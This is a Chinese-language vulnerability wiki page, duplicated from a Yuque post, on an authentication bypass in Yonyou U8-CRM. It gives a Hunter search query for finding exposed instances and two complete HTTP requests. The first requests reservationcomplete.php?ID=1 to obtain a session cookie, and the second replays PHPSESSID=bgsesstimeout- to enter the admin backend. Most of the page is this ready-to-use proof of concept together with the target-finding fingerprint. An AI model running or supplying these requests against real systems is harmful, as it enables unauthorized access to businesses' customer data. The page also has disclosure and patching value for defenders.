fofamini-wiki

登录白背景

源码

用友U8-CRM reservationcomplete存在身份认证绕过漏洞

一、漏洞简介

用友crm客户关系管理的第一需求就是对客户信息的集中管理和共享利用，即客户资源的企业化管理，避免因业务调整或人员变动造成的客户资源流失和客户管理盲区的产生；更重要是可以通过完善的客户信息来支持不同业务角色面向客户的工作，实现客户信息在企业内部充分共享利用，提高面向客户的工作有效性和效率，从而全面提升客户的满意度。用友U8-CRM reservationcomplete存在身份认证绕过漏洞，攻击者可通过该漏洞绕过身份认证进入系统。

二、影响版本

用友U8-CRM

三、资产测绘

hunterapp.name="用友 CRM"
登录页面

四、漏洞复现

获取cookie

GET /background/reservationcomplete.php?ID=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

进入后台

GET / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=bgsesstimeout-; path=/
Upgrade-Insecure-Requests: 1

原文: https://www.yuque.com/xiaokp7/ocvun2/pk6xnxq92dfvbnuq

# 用友U8-CRM reservationcomplete存在身份认证绕过漏洞

# 一、漏洞简介
 用友crm客户关系管理的第一需求就是对客户信息的集中管理和共享利用，即客户资源的企业化管理，避免因业务调整或人员变动造成的客户资源流失和客户管理盲区的产生；更重要是可以通过完善的客户信息来支持不同业务角色面向客户的工作，实现客户信息在企业内部充分共享利用，提高面向客户的工作有效性和效率，从而全面提升客户的满意度。用友U8-CRM reservationcomplete存在身份认证绕过漏洞，攻击者可通过该漏洞绕过身份认证进入系统。

# 二、影响版本

- 用友U8-CRM

# 三、资产测绘

- hunter`app.name="用友 CRM"`
- 登录页面

![image.png](./img/9j0D8aD0E-5UicCU/1693536875747-1fc362ca-c65d-4927-8cb2-dfaace3c3e8a-891170.png)

# 四、漏洞复现

1. 获取cookie
```java
GET /background/reservationcomplete.php?ID=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
![image.png](./img/9j0D8aD0E-5UicCU/1704676744693-2fdc7cbb-ee19-4dc0-a69d-29b8689f1d6c-575737.png)

2. 进入后台
```java
GET / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=bgsesstimeout-; path=/
Upgrade-Insecure-Requests: 1
```
![image.png](./img/9j0D8aD0E-5UicCU/1704676786512-eedad6ef-5140-405b-934c-114b849e5539-402487.png)
![image.png](./img/9j0D8aD0E-5UicCU/1704676833519-efdeaf93-66dd-41f1-ac38-a6b8248b290d-038027.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pk6xnxq92dfvbnuq>